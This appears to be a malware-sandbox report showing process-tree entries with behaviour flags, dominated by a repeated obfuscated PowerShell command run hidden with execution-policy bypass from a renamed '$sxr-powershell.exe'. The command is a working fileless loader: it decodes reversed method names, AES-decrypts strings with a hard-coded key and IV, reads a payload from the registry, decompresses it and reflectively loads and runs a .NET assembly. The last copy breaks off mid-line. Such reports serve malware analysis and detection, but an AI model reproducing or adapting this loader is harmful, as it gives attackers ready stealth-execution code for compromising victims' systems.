[Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5928

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5928).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5928).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
- Executes dropped EXE
PID:2552

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5928).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = 